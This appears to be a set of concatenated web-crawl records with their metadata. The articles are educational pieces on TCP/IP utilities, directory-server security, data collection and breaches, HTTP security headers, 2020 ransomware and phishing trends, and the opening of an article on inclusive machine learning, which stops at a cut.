A lot of newcomers to TCP/IP wonder why an Application Layer is needed, since the Transport Layer handles a lot of interfacing between the network and applications. While this is true, the Application Layer focuses more on network services, APIs, utilities, and operating system environments. If you know the TCP/IP stack and OSI model well enough, you'll know that there are three OSI model layers that correspond to the TCP/IP Application Layer. By breaking the TCP/IP Application Layer into three separate layers, we can better understand what responsibilities the Application Layer actually has.

The OSI Equivalent of the TCP/IP Application Layer
- 1. Application Layer – The seventh OSI model layer (which shouldn't be confused with the TCP/IP stack's Application Layer). It supports network access, as well as provides services for user applications.
- 2. Presentation Layer – The sixth OSI model layer is the Presentation Layer. It translates data into a format that can be read by many platforms. With all the different operating systems, programs, and protocols floating around, this is a good feature to have. It also has support for security encryption and data compression.
- 3. Session Layer – The fifth layer of the OSI model is the Session Layer. It manages communication between applications on a network, and is used particularly for streaming media or web conferencing.

To better grasp the concepts of the Application Layer, we'll take a look at a few examples of the Application Layer in action.

Application Layer APIs
If you aren't hip to the nerdy lingo, don't worry: API simply stands for Application Programming Interface. An API is just a collection of functions that allows programs to access an internal environment. A good example of an API is DirectX. If you've ever run a multimedia application and used Windows at the same time, odds are you have come into contact with DirectX. DirectX is made up of many different components that allow programmers to create multimedia applications (such as video games).

There are many types of APIs to delve into. You may have heard of NetBIOS, Winsock, or WinAPI among others. The world of APIs has also extended to web services. You may have heard of a Google API, for instance. In this case Google allows developers to use its internal functions, yet also keeps Google's internal code safe from prying eyes. (Otherwise, there would be a few security concerns on Google's part.)

The Application Layer handles network services; most notably file and printing, name resolution, and redirector services. Name resolution is the process of mapping a human-readable name to an IP address. You may be familiar with the name Google more so than the IP address of Google. Without name resolution, we would have to remember four octets of numbers for each website we wanted to visit - not very friendly, is it?

A redirector, otherwise known as a requester, is a service that is largely taken for granted. It is a handy little service that looks at requests a user may make: if a request can be fulfilled locally, it is done so. If the request requires a redirection to another computer, then the request is forwarded onto another machine.
This enables users to access network resources just like they were an integral part of the local system. A user could browse files on another computer just like they were located on the local computer- obviously redirector services are fairly powerful. Lastly we have file and print services. If a computer needs to access a file server or a printer, these services will allow the computer to do so. It is fairly self-explanatory, but worth reviewing nonetheless. This is where most people have experience- within the network utilities section of the Application Layer. Every time you use a Ping, Arp, or Traceroute command, you are taking full advantage of the Application Layer. It’s quite convenient that the Application Layer is located on the top of the TCP/IP stack. We can send a Ping and, if successful, can verify that the TCP/IP stack is successfully functioning. It’s a good idea to commit each utility to memory, as they are very useful for maintaining, configuring, and troubleshooting networks. Listed below are seven of the most used utilities. Seven TCP Utilities Explained - 1. ARP – Arp stands for Address Resolution Protocol. It is used to map an IP address to a physical address found on your NIC card. Using this command can tell us what physical address belongs to which IP address. - 2. Netstat – Netstat is a handy tool that displays local and remote connections to the computer. It displays IP addresses, ports, protocol being used, and the status of the connection. - 3. Ping – Ping is a simple diagnostic tool that can check for connectivity between two points on a network. It is one of the most used TCP/IP utilities when setting up a network or changing network settings. - 4. TraceRT – Tracert, or traceroute, is a command that will show the path that packets of data take while being sent. It’s handy for checking to see where a possible network failure lies, or even for ensuring that data packets are taking the fastest route possible on a network. - 5. FTP / TFTP – FTP and TFTP are both used for transferring files. It is important to note that FTP is a TCP utility, while TFTP is a UDP utility. TFTP tends to be less secure than FTP, and is generally only used for transferring non-confidential files over a network when speed is concerned. - 6. Hostname – Hostname is a simple command that displays the hostname of the current computer. Simple, yet effective. - 7. Whois – Whois information is just like an online phonebook. It shows the contact information for owners of a particular domain. By using a Whois search, you will find that Google is based in California. The Application Layer isn’t as exciting as the others. We don’t really have much physical interaction with the Application layer, and most of the fun applies to developers and geeks only. There is still much to learn- TCP/IP is just the very beginning of the networking world. But with this lesson on the final TCP/IP layer complete, you can now say that you have a much better understanding of the TCP/IP model. (And networking in general.)
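To tie the name resolution and utilities discussion above together, here is a small, illustrative Python sketch that resolves a hostname to an IP address and then attempts a TCP connection, a rough stand-in for the kind of reachability check Ping performs (Ping itself uses ICMP rather than TCP, and the hostname and port below are just example values).

```python
import socket

def resolve_and_check(hostname, port=80, timeout=3):
    """Resolve a hostname (name resolution) and try a TCP connection to it."""
    ip_address = socket.gethostbyname(hostname)  # DNS lookup: name -> IP address
    print(f"{hostname} resolves to {ip_address}")
    try:
        # Open and immediately close a TCP connection as a simple reachability test.
        with socket.create_connection((ip_address, port), timeout=timeout):
            print(f"TCP connection to {ip_address}:{port} succeeded")
    except OSError as exc:
        print(f"Could not connect to {ip_address}:{port}: {exc}")

resolve_and_check("example.com")  # example hostname
```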
<urn:uuid:6f8660c4-c509-4d9e-957d-70daa4b0e3e0>
CC-MAIN-2022-40
https://www.itprc.com/how-the-application-layer-works/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338213.55/warc/CC-MAIN-20221007143842-20221007173842-00620.warc.gz
en
0.918463
1,452
3.546875
4
This short introduction provides an overview of DS security features. When DS servers must store sensitive data, and file permissions alone are not sufficient, they use encryption and digests:

Encryption turns source data into a reversible code. Good design makes it extremely hard to recover the data from the code without the decryption key. Encryption uses keys and cryptographic algorithms to convert source data into encrypted codes and back again. Given the decryption key and the details of the algorithm, converting an encrypted code back to source data is straightforward, though it can be computationally intensive. DS software does not implement its own versions of all encryption algorithms. Instead, it often relies on cryptographic algorithms provided by the underlying JVM. DS servers do manage access to encryption keys, however. An important part of server configuration concerns key management. DS servers use encryption to protect data and backup files on disk. They can encrypt password values when you configure a reversible storage scheme. Another important use of encryption is to make network connections secure.

A digest (also called a hash) is a non-reversible code generated from source data using a one-way hash function. (A hash function is one that converts input of arbitrary size into output of fixed size.) Good one-way hash design makes it effectively impossible to retrieve the source data even if you have access to the hash function. The hash function makes it simple to test whether a given value matches the original. Convert the value into a digest with the same hash function. If the new digest matches the original digest, then the values are also identical. DS servers use digests to store hashed passwords, making the original passwords extremely hard to recover. They also use digests for authentication and signing.

In DS software, two types of encryption keys are used:

Symmetric keys, also called secret keys because they must be kept secret. A single symmetric key is used for both encryption and decryption.

Asymmetric key pairs, consisting of a sharable public key and a secret private key. Either key can be used for encryption and the other for decryption.

DS servers manage incoming client connections using connection handlers. Each connection handler is responsible for accepting client connections, reading requests, and sending responses. Connection handlers are specific to the protocol and port used. For example, a server uses one connection handler for LDAPS and another for HTTPS. The connection handler configuration includes optional security settings. When you configure a handler, specify a key manager provider and a trust manager provider:

The key manager provider retrieves the server certificate when negotiating a secure connection. A key manager provider is backed by a keystore, which stores the server's key pairs.

The trust manager provider retrieves trusted certificates, such as CA certificates, to verify trust for a certificate presented by a peer when setting up a secure connection. A trust manager provider is backed by a keystore that contains trusted certificates, referred to as a truststore when used in this way.

DS servers support file-based keystores and PKCS#11 security tokens, such as HSMs. Always use secure connections when allowing access to sensitive information. For details, see Secure Connections.

DS servers use cryptographic mechanisms for more than setting up secure connections:

Encrypted backup files must be decrypted when restored.
Passwords can be protected by encryption rather than hashing, although this is not recommended.

Database backends can be encrypted for data confidentiality and integrity.

For all operations where data is stored in encrypted form, all replicas must be trusted to access the secret key. Trust between servers depends on a public key infrastructure. This type of infrastructure is explained in more detail in Public Key Infrastructure.

Replication requires trust between the servers. Trust enables servers to secure network connections, and to share symmetric keys securely. Servers encrypt symmetric keys with a shared master key, and store them in replicated data. When a server needs the symmetric key for decryption or further encryption, it decrypts its copy with the master key.

The component that provides a common interface for cryptographic functions is called the DS Crypto Manager. You can configure the following Crypto Manager features:

Protection for symmetric keys.

The alias of the shared master key to use for protecting secret keys.

Cipher key lengths, algorithms, and other advanced properties.

Authentication is the act of confirming the identity of a principal, such as a user, application, or device. The main reason for authentication is that authorization decisions are based on the identity of the principal. Servers should require authentication before allowing access to any information that is not public.

Authentication mechanisms depend on the access protocol. HTTP has a number of mechanisms, such as HTTP Basic. LDAP has other mechanisms, such as anonymous bind and external SASL. For details on supported mechanisms, see Authentication Mechanisms.

Authorization is the act of determining whether to grant a principal access to a resource. DS servers authorize access based on these mechanisms:

Access control instructions (ACI)
Access control instructions provide fine-grained control over LDAP operations permitted for a principal. ACIs can be replicated.

Privileges
Privileges control access to administrative tasks, such as backup and restore operations, making changes to the configuration, and other tasks. Privileges can be replicated.

Global access control policies
Global access control policies provide coarse-grained access control for proxy servers, where the lack of local access to directory data makes ACIs a poor fit.

For details about ACIs and global access control policies with proxy servers, see Access Control. For details about privileges, see Administrative Roles.

You must monitor deployed services for evidence of threats and other problems. Interfaces for monitoring include the following:

Remote monitoring facilities that client applications can access over the network. These include JMX and SNMP connection handlers, and the monitor backend that is accessible over LDAP and HTTP.

Alerts to notify administrators of significant problems or notable events over JMX or by email.

Account status notifications to send users alerts by email, or to log error messages when an account state changes.

Logging facilities, including local log files for access, debugging, entry change auditing, and errors. ForgeRock Common Audit event handlers support local logging and sending access event messages to a variety of remote logging and reporting systems. For details, see Monitoring.
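The digest-matching idea described earlier (hash the candidate value with the same function and compare it against the stored digest) can be illustrated in a few lines of Python. This is a generic sketch using a salted SHA-256 digest, not the specific password storage schemes DS ships with, and the password strings are just example values.

```python
import hashlib
import os
from hmac import compare_digest

def make_digest(password, salt=None):
    """Return (salt, digest) for a password using a salted SHA-256 one-way hash."""
    salt = salt or os.urandom(16)
    digest = hashlib.sha256(salt + password.encode("utf-8")).digest()
    return salt, digest

def verify(password, salt, stored_digest):
    """Re-hash the candidate value and compare it with the stored digest."""
    _, candidate = make_digest(password, salt)
    return compare_digest(candidate, stored_digest)  # constant-time comparison

salt, stored = make_digest("correct horse battery staple")  # example value
print(verify("correct horse battery staple", salt, stored))  # True
print(verify("wrong guess", salt, stored))                   # False
```

Because the hash is one-way, the stored digest does not reveal the original password, yet any candidate value can still be checked against it.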
<urn:uuid:4930d0d1-84ac-45cb-acd4-7110291b1d61>
CC-MAIN-2022-40
https://backstage.forgerock.com/docs/ds/7.1/security-guide/features.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337432.78/warc/CC-MAIN-20221003200326-20221003230326-00020.warc.gz
en
0.871207
1,370
3.453125
3
How much data is produced every day? A quick Google search will tell you the current estimate stands at 2.5 quintillion bytes. For those of us that don't know the difference between our zettabytes and yottabytes, that's 2,500,000,000,000,000,000 bytes, a staggering 19-digit number! Basically, the simple answer is a lot. A lot of data is produced and collected every day – and it is growing exponentially.

It might be hard to believe but the vast majority of the world's data has been created in the last few years. Fueled by the internet of things and the perpetual growth of connected devices and sensors, data continues to grow at an ever-increasing rate as more of our world becomes digitized and 'datafied'. In fact, IDC predicts the world's data will grow to 175 zettabytes by 2025. It's mind-boggling to think that humans are generating this, particularly when looked at in the context of one day. Or is it?

Data captured and stored daily includes anything and everything from photos uploaded to social media from your latest vacation, to every time you shout at your Google Home or Amazon Echo to turn on the radio or add to the shopping list, even information gathered by the Curiosity rover currently exploring Mars. Every digital interaction you have is captured. Every time you buy something with your contactless debit card? Every time you stream a song, movie or podcast? It's all data. When you walk down the street or go for a drive, if you have a digital device with you, whether it's your smartphone, smartwatch, or both – more data.

The majority of us are aware, possibly apathetic, that this data is collected by companies – but what might be more pernicious is the number of listeners out there and the level of granular engagement that is tracked. From device usage to Facebook likes, Twitches, online comments, even viewing-but-skipping-over a photograph in your feed, whether you swipe left or right on Tinder, filters you apply on selfies – this is all captured and stored. If you have a Kindle, Amazon knows not only how often you change a page but also whether you tap or swipe the screen to do so. When it comes to Netflix, yes, they know what you have watched but they also capture what you search for, how far you've gotten through a movie and more. In other words, big data captures the most mundane and intimate moments of people's lives.

It's not overly surprising that companies want to harvest as much about us as possible because – well, why wouldn't they? The personal information users give away for free is transformed into a precious commodity. The more data produced, the more information they have to monetize, whether it's to help them target advertisements at us, track high-traffic areas in stores, show us more dog videos to keep us on their site longer, or even sell to third parties. For the companies, there's no downside to limitless data collection.

Data management: Data protection is weak
The nature of technology evolution is that we moved from ephemeral management of data to permanent management of data. The driver of that is functionality. On the one hand, the economics of the situation make it so that there is very little cost to storing massive amounts of data. However, what of the security of that data – the personal, the mundane, the intimate day-to-day details of our lives that we in some cases unwillingly impart? Many express concerns about Google, Facebook and Amazon having too much influence. Others believe it matters not what information is collected but what inferences and predictions are made based upon it.
How companies can use it to exert influence, such as whether someone should maintain their health care benefits, or be released on bail – or even whether governments could influence the electorate – Cambridge Analytica, I hear you shout. However, while these are valid concerns, what should be more troubling is the prospect of said personal data falling into the wrong hands.

Security breaches have become all too common. In 2019, cyber-attacks were considered among the top five risks to global stability. Yahoo holds the record for the largest data breach of all time with 3 billion compromised accounts. Other recent notable breaches include First American Financial Corp., which had 885 million records exposed online, including bank transactions, social security numbers and more; and Facebook, which saw 540 million user records exposed on an Amazon cloud server. However, they are certainly not alone atop a long list of breaches. Moreover, while it is certainly easier to point the finger in the direction of hackers, well-known brands including Microsoft, Estee Lauder and MGM Resorts have accidentally exposed data online – visible and unprotected for any and all to claim.

COVID-19 has only compounded the issue, providing perfect conditions for cyberattacks and data breaches. By the end of Q2 2020, it was already said to be the "worst year on record" in terms of total records exposed. By October, the number of records breached had grown to a mind-boggling 36 billion.

Brands and companies – mostly – do not have bad intentions. They are guilty of greed perhaps, but these breach examples highlight how ill-prepared the industry is when it comes to protecting harvested data. The volume collected, along with often lackluster security, provides easy pickings for exploitation. In the wrong hands, our seemingly mundane data can be combined with other data streams to provide ammunition to conduct an effective social engineering campaign. For example, there is a lot of information that can be "triangulated" about you that may not be represented by explicit data. Even just by watching when and how you behave on the web, social engineers can determine who your friends and associates are. Think that doesn't mean much? That information is a key ingredient in many kinds of fraud and impersonation.

One could postulate that the progress of social engineers should not be thought of merely as an impressive technological advancement in cybercrime. Rather, these criminals have peripherally benefitted from every other industry's investment in data harvesting.

Data management: Rethinking data exposure
We give up more data than we'll ever know. While it would be nearly impossible, if not unrealistic, to shut down this type of collection completely, we need to rethink how much we unwittingly disclose to help reduce the risk of falling foul of cybercrime.
<urn:uuid:1fb53058-3936-4e5c-b4fe-16bc97cca945>
CC-MAIN-2022-40
https://getpicnic.com/2021/12/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338280.51/warc/CC-MAIN-20221007210452-20221008000452-00020.warc.gz
en
0.948091
1,336
2.921875
3
Sven Morgenroth on Security Weekly
Invicti security researcher Sven Morgenroth joined Paul Asadoorian on Paul's Security Weekly #652 to describe and demonstrate various HTTP headers related to security. Watch the full interview below and read on for an overview of Sven's presentation of HTTP security headers.

What are HTTP Security Headers?
HTTP security headers are a subset of HTTP headers and are exchanged between a web client (usually a browser) and a server to specify the security-related details of HTTP communication. Some HTTP headers that are indirectly related to privacy and security can also be considered HTTP security headers. By enabling suitable headers in web applications and web server settings, you can improve the resilience of your web application against many common attacks, including cross-site scripting (XSS) and clickjacking. See our whitepaper on HTTP security headers for a detailed discussion of available headers.

How HTTP Security Headers Can Improve Web Application Security
When we talk about web application security, especially on this blog, we usually mean finding exploitable vulnerabilities and fixing them in application code. HTTP security headers provide an extra layer of security by restricting behaviors that the browser and server allow once the web application is running. In many cases, implementing the right headers is a crucial aspect of a best-practice application setup – but how do you know which ones to use?

As with other web technologies, HTTP headers come and go depending on browser vendor support. Especially in the field of security, headers that were widely supported a few years ago can already be deprecated. At the same time, completely new proposals can gain universal support in a matter of months. Keeping up with all these changes is not easy. To help you decide what to implement, Invicti checks for the presence and correctness of many HTTP security headers and provides clear information and recommendations.

The Most Important HTTP Security Headers
Let's dive into an overview of selected headers, starting with a few of the best-known HTTP response headers.

When enabled on the server, HTTP Strict Transport Security (HSTS) enforces the use of encrypted HTTPS connections instead of plain-text HTTP communication. A typical HSTS header might be:
Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
This would inform the visiting web browser that the current site (including subdomains) is HTTPS-only and the browser should access it over HTTPS for the next 2 years (the max-age value in seconds). The preload directive indicates that the site is present on a global list of HTTPS-only sites. Preloading is intended to speed up page loads and eliminate the risk of man-in-the-middle (MITM) attacks when a site is visited for the first time.

The Content Security Policy (CSP) header is the Swiss Army knife of HTTP security headers and the recommended way to protect your websites and applications against XSS attacks. It allows you to precisely control permitted content sources and many other parameters. A basic CSP header to allow only assets from the local origin is:
Content-Security-Policy: default-src 'self'
Other directives include script-src, style-src, and img-src to specify permitted sources for scripts, CSS stylesheets, and images, respectively. For example, specifying script-src 'self' would only allow scripts from the local origin. You can also restrict plugin sources using plugin-types (unsupported in Firefox) or object-src. Invicti checks if the CSP header is present.
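To show what sending these headers looks like in practice, here is a small, illustrative Python example using only the standard library. It serves a single page with HSTS, CSP, and a couple of other headers attached; the specific policy values are just the examples discussed above, not a recommendation for any particular site, and browsers only honor HSTS when it is delivered over HTTPS.

```python
from http.server import BaseHTTPRequestHandler, HTTPServer

SECURITY_HEADERS = {
    "Strict-Transport-Security": "max-age=63072000; includeSubDomains",
    "Content-Security-Policy": "default-src 'self'",
    "X-Frame-Options": "DENY",
    "X-Content-Type-Options": "nosniff",
}

class SecureHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        body = b"<h1>Hello with security headers</h1>"
        self.send_response(200)
        self.send_header("Content-Type", "text/html; charset=utf-8")
        self.send_header("Content-Length", str(len(body)))
        for name, value in SECURITY_HEADERS.items():
            self.send_header(name, value)  # attach each security header to the response
        self.end_headers()
        self.wfile.write(body)

if __name__ == "__main__":
    HTTPServer(("127.0.0.1", 8080), SecureHandler).serve_forever()
```

In a production setup the same headers would normally be configured in the web server or framework middleware rather than hand-written per handler.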
The X-Frame-Options header was first introduced in Microsoft Internet Explorer to provide protection against clickjacking and other attacks involving HTML iframes. To prevent the current page from being loaded into any iframes, you would use:
X-Frame-Options: DENY
Other supported values are sameorigin to allow loading into iframes with the same origin and allow-from to indicate specific URLs. This header can usually be replaced by suitable CSP directives. Invicti checks if the X-Frame-Options header is present.

Deprecated HTTP Security Headers
Some headers were introduced as temporary fixes for specific security issues. As web technology moves on, these become deprecated, often after just a few years of browser support. Here are just two examples of deprecated headers that were intended to address specific vulnerabilities.

As the name implies, the X-XSS-Protection header was intended to protect against cross-site scripting. A typical header would be:
X-XSS-Protection: 1; mode=block
This non-standard header was intended for browsers with XSS filters and provided control of the filtering functionality. In practice, it was relatively easy to bypass or abuse, and as modern browsers no longer use XSS filtering, the header is now deprecated. Invicti checks if you have set X-XSS-Protection for your websites.

HTTP Public Key Pinning (HPKP) was introduced in Google Chrome and Firefox as a way to prevent certificate spoofing. It was a complicated mechanism where the server presented the web client with cryptographic hashes of valid certificate public keys for future communication. A typical header would be:
Public-Key-Pins: pin-sha256="cUPcTAZWKaASuYWhhneDttWpY3oBAkE3h2+soZS7sWs="; max-age=5184000
In practice, public key pinning proved too complicated to use. If incorrectly configured, the header could completely disable website access for the time specified in the max-age parameter (2 months in this example). The feature was deprecated in favor of certificate transparency logs – see the Expect-CT header below.

Other Useful HTTP Security Headers
While not as crucial as CSP and HSTS, the headers below can also help you to harden your web application.

To prevent website certificate spoofing, the Expect-CT header can be used to indicate that only new certificates added to Certificate Transparency logs should be accepted. A typical header would be:
Expect-CT: max-age=86400, enforce, report-uri="https://example.com/report"
With the enforce directive, clients are instructed to refuse connections that violate Certificate Transparency policy. The optional report-uri directive indicates a location for reporting failures. Invicti reports missing Expect-CT headers with a Best Practice severity level.

When present in server responses, the X-Content-Type-Options header forces web browsers to strictly follow the MIME types specified in Content-Type headers. This protects websites from cross-site scripting attacks that abuse MIME sniffing capabilities to supply malicious code masquerading as a non-executable MIME type. The header has just one directive:
X-Content-Type-Options: nosniff
Invicti checks if Content-Type headers are set and X-Content-Type-Options: nosniff is present.

Fetch Metadata Headers
A new set of client-side headers allows the browser to inform the server about different HTTP request attributes. Four headers currently exist:
Sec-Fetch-Site: Indicates the intended relationship between the initiator and target origin.
Sec-Fetch-Mode: Indicates the intended request mode.
Sec-Fetch-User: Indicates if the request was triggered by the user.
Sec-Fetch-Dest: Indicates the intended request destination.
If supported by both the server and the browser, these headers can be used to inform the server about intended application behaviors and so help identify suspicious requests.

HTTP Headers to Improve Privacy and Security
The final items are not strictly HTTP security headers, but they can be used to improve both security and privacy.

The Referrer-Policy header controls if and how much referrer information should be revealed to the web server. Typical usage would be:
Referrer-Policy: origin-when-cross-origin
With this header, the browser will only reveal complete referrer information (including the URL) for same-origin requests. For all other requests, only information about the origin is sent. Invicti reports missing Referrer-Policy headers with a Best Practice severity level.

The Cache-Control header lets you control the caching of specific web pages. Although several directives are available, typical usage is:
Cache-Control: no-store
This prevents any caching of the server response, which can be useful for ensuring that confidential data is not retained in any caches. Other directives are available for more precise control of caching.

To make sure that confidential information from a website is not stored by the browser after the user logs out, you can set the Clear-Site-Data header, for example:
Clear-Site-Data: "*"
This will clear all browsing data related to the site. Directives such as cache, cookies, and storage are available for more fine-grained control over what is cleared.

The experimental Feature-Policy header allows you to deny access to specific browser features and APIs for the current page. This can be used to control application functionality but also to improve privacy and security. For example, to ensure that an application can't use the microphone and camera APIs, you would send the following header:
Feature-Policy: microphone 'none'; camera 'none'
Many more directives are available – see the Feature-Policy documentation on MDN for a full list.

Keep Track of Your HTTP Security Headers with Invicti
HTTP security headers are often an easy way to improve web application security without changing the application itself, so it's always a good idea to use the most current headers. However, because vendor support for HTTP headers can change so quickly, it's hard to keep everything updated, especially if you're working with hundreds of websites. To help you keep up-to-date and stay secure, Invicti's vulnerability checks include testing for recommended HTTP security headers. Invicti checks if the header is present and correctly configured, and provides clear recommendations to ensure that your web applications always have the best protection.
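As a companion to the examples above, here is a small, illustrative Python script that fetches a URL and reports which of a handful of recommended response headers are missing. The header list and the example URL are assumptions for the demo; it is a quick spot check rather than a replacement for a full scanner.

```python
import urllib.request

RECOMMENDED = [
    "Strict-Transport-Security",
    "Content-Security-Policy",
    "X-Frame-Options",
    "X-Content-Type-Options",
    "Referrer-Policy",
]

def check_headers(url):
    """Fetch a URL and print which recommended security headers are present."""
    with urllib.request.urlopen(url) as response:
        present = {name.lower(): value for name, value in response.getheaders()}
    for name in RECOMMENDED:
        value = present.get(name.lower())
        status = f"present: {value}" if value else "MISSING"
        print(f"{name:30} {status}")

check_headers("https://example.com")  # example target
```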
<urn:uuid:f89351e5-6625-4b23-8c36-8b8e1294d739>
CC-MAIN-2022-40
https://www.invicti.com/blog/web-security/http-security-headers/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334620.49/warc/CC-MAIN-20220925225000-20220926015000-00221.warc.gz
en
0.857048
2,177
2.609375
3
October is Cybersecurity Awareness Month, which is all about promoting best practices for staying safe online. Beyond promoting the basics of good cyber-hygiene, it's also a good idea to take stock of the trends that have been floating around. Indeed, much like the rest of 2020, it's been quite the year in cybersecurity. COVID-19 brings new and devastatingly creative phishing attacks; ransomware hits remote learning and local governments; and security extends beyond email to collaboration apps. To be a good cyber-citizen means being able to understand these trends and knowing how to take action. Though we could write about thousands of things, there have been a few trends in particular that have stood out as harbingers of the future of cybersecurity.

Tracking the first six months of cyber activity, SonicWall found that global ransomware increased by 20%. However, within that increase, a striking amount has been centered in the U.S. In those six months, there's been a 109% increase stateside. The total of 80 million ransomware attacks in America was a whopping 13 times higher than the next-highest country, the U.K. In particular, ransomware cases have been centered around government, public administration agencies and hospitals. This was most notable in the $1.14 million ransom demand that UC San Francisco paid out to recover medical school data. Further, we've seen hackers hit companies involved in the COVID vaccine efforts. In the first quarter of 2020, 21% of all ransomware attacks were against government agencies. Last year, more than 70 state and local governments were hit with ransomware attacks, ranging in size from Greenland, New Hampshire (pop: 3,549) to Baltimore (pop: 619,439) and in general, there was a 41% increase in all ransomware attacks in 2019. The average payment in Q4 of 2019 was more than double what it was in Q3 of that year. IBM's Security X-Force team reported that one in four attacks that they have worked on this year have been caused by ransomware—and one-third of all those attacks happened in June. It's no wonder that one survey found that 89% of companies cite ransomware, phishing and web attacks as their biggest threat. And it's not just companies. With a majority of learning happening online, the FBI warned in June of a surge in potential attacks, due to the combination of new technologies and the highly sensitive data that schools hold. We've seen scores of attacks, and they have real-world consequences. A Nevada school district that refused to pay ransom saw reams of student data released. However, it's not an entirely new phenomenon. From October 2019-December 2019, 11 districts were hit with attacks; there was a total of at least 72 hit in all of 2019. And that's just the ones that went public. Ransomware has been, in many respects, the defining trend of the year. And there's no reason to expect it will slow down.

Misinformation. Fear. Confusion. Panic. If there was ever a perfect moment for hackers to take advantage of, it was the dawn of COVID-19. There has been a tremendous rise in phishing attacks since COVID-19 hit—too many to document here. One survey found that the increase in attacks can be attributed, at least in part, to hackers' boredom due to stay-at-home measures. More than that, hackers may be exploiting the human factor in phishing attacks. Hackers are particularly skilled in forcing end-users to make split-second decisions.
When employees are juggling their own work, helping children with schoolwork, dealing with limited WiFi and myriad other distractions, that split-second decision becomes a whole lot more difficult. Even with training, and without as many distractions, aggregate clickthrough rates give an attacker a 1 in 10 chance per employee. Now compound that with untrained, distracted employees, and the risk becomes exponential. That's why we've seen some of the following numbers, headlined by this stat—1 in 3 Americans have clicked on a phishing link this year.
- One survey found that 46% of businesses worldwide have encountered at least one cybersecurity scare since remote work began, and 49% expect to see another attack in the next month. Further, 51% of companies surveyed found an increase in phishing attacks.
- Google found more than 18 million malware and phishing emails related to COVID-19 in one week in April, along with 240 million daily corona-related spam messages.
- Checkpoint found that 4,305 domains have been registered around the CARES Act, the government's stimulus package. Some 2% of those domains were found malicious, while 21% were found suspicious.
- Additionally, Checkpoint saw 192,000 corona-related cyber attacks per week over a three week period ending in early May, a 30% increase. Many phishing attacks claim to be from the World Health Organization, or contain files with "COVID-19" in the name.
- IBM X-Force found a more than 6,000% increase in COVID-19 related spam, ranging from phishing attacks impersonating the Small Business Administration to others impersonating U.S. banks. One attack in particular pretended to be from American Express, dangling $2,400 in relief in exchange for credentials. In addition, another report from the company found that attackers are mimicking the SBA, which is offering up to $10 million in lending to companies, and instead installing a remote hacking tool to steal passwords.

Phishing has long been a problem—indeed, it's the top threat, as backed up by the findings of the Verizon Data Breach Investigation Report—and a staggering 91% of breaches start with email. Hackers will take advantage of anything to get the information. COVID-19 was, and remains, the perfect storm.

When work went remote, collaboration platforms like Microsoft Teams and Slack were perfectly set up for success. And, in particular, Teams has grown exponentially. By June, Microsoft Teams grew by 894% compared with usage in the middle of February. As of April, it was reporting 75 million users. Slack has also broken records for usage. And that's not to mention other collaboration apps that have made working from home even a possibility—OneDrive, SharePoint, Google Drive, Dropbox, etc. That these apps exist, making the transition to working from home possible, has been one of the saving graces of a tumultuous year. But these apps are not without risks. Slack and Teams are particularly prone to data loss, malware and insider threats. They're also perfect vectors for East-West attacks. In one recent Teams attack, for example, a simple animated GIF was used to steal the user's session token and gain access to their account. A malicious cat video that would have been blocked had it been sent via email was able to spread unfiltered on Teams. Worse, this attack gave attackers full access to the user's entire account, making it easy to continue the spread. If work is going to continue remotely for the foreseeable future, businesses have to think about securing the entire ecosystem. Securing email is no longer enough.
Every platform where data and information lives has to be protected. How do we make sense of a cyber year different from all others? Perhaps we don't. But if there's one thing we've learned from 2020, it's that being proactive with protection is key. If everything important in your environment is properly secured, then business can continue unabated. Risks will never go away. Hackers will find new motivations to target end-users. And whenever there is data to be had, there will be those looking to profit from it. If there's anything to take away from Cybersecurity Awareness Month, perhaps it's this: Knowing that these risks exist is an empowering feeling. And knowing how to protect against them is even more so.
<urn:uuid:6c30cf73-cd26-4e05-8bde-7c0743f5282f>
CC-MAIN-2022-40
https://www.avanan.com/blog/cybersecurity-awareness-month-trends-dominating-the-news
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335257.60/warc/CC-MAIN-20220928145118-20220928175118-00221.warc.gz
en
0.971359
1,656
2.546875
3
You probably know that taking advantage of machine learning, or ML, requires collecting accurate data and developing algorithms that can analyze it quickly and efficiently. But here's another imperative for machine learning that businesses often overlook: ensuring that machine learning models are fair and ethical by taking an "inclusive" approach to ML. Increasingly, businesses are turning to inclusive machine learning to mitigate biases and inaccuracies that can result from poorly designed ML models. Keep reading for a look at how inclusive machine learning works, why it matters, and how to put its principles into practice.

What Is Inclusive Machine Learning?

Inclusive machine learning is an approach to ML that prioritizes fair decision-making. It's called inclusive because it aims to remove the biases that could lead to unfair decisions by ML models about certain demographic groups. For example, inclusive ML can help businesses avoid ML-powered facial recognition tools that disproportionately fail to recognize people of certain ethnicities accurately. Or, it could help develop chatbots that are able to handle queries in non-standard dialects of a given language.

The Benefits of Inclusive Machine Learning

Perhaps the most obvious reason to embrace inclusive machine learning is that it's simply the right thing to do in an ethical sense. Businesses don't want their employees to make biased decisions when the decision-making process takes place manually, so they should seek to avoid bias in automated, ML-driven decision-making, too. But even if you set ethical considerations aside, there are business-centric benefits to inclusive ML:
- Reach more users: The more fair and accurate your models, the better positioned you'll be to serve as broad a set of users as possible.
- Create happier users: You'll achieve a better user experience, and generate happier users, when your ML models make accurate decisions about everyone.
- Reduce complaints and support requests: Unfair ML can lead to problems like failure to log in using facial recognition. Those problems turn into support requests that your IT team has to handle. With inclusive ML, however, you can avoid these requests — and reduce the burden placed on your IT team.
- Make more use of ML: When you embrace inclusive ML and design models that are fair and accurate, you can make use of ML in parts of your business where you otherwise may not be able to, due to the risk of inaccurate decision-making.
You don't need to have an MBA to read between the lines here: Inclusive machine learning translates to happier users, greater operational efficiency, and — ultimately — more profit for your business. So, even if you couldn't care less about ethics, it's smart from a business perspective to implement inclusive ML.

How Does Inclusive ML Work?

Inclusive machine learning requires two key ingredients: fair models and fair training data.

Fair ML models

ML models are the code that interprets data and draws conclusions based on it. The way that you build fair ML models will depend on which type of model you are creating and which data it needs to analyze. In general, however, you should strive to define metrics and analytics categories that avoid over- or underrepresenting a given group. As a simple example, consider an algorithm that analyzes faces and assigns a gender label to each one. To make your model inclusive, you'd want to avoid having "male" or "female" be the only gender categories you define.
Fair training data

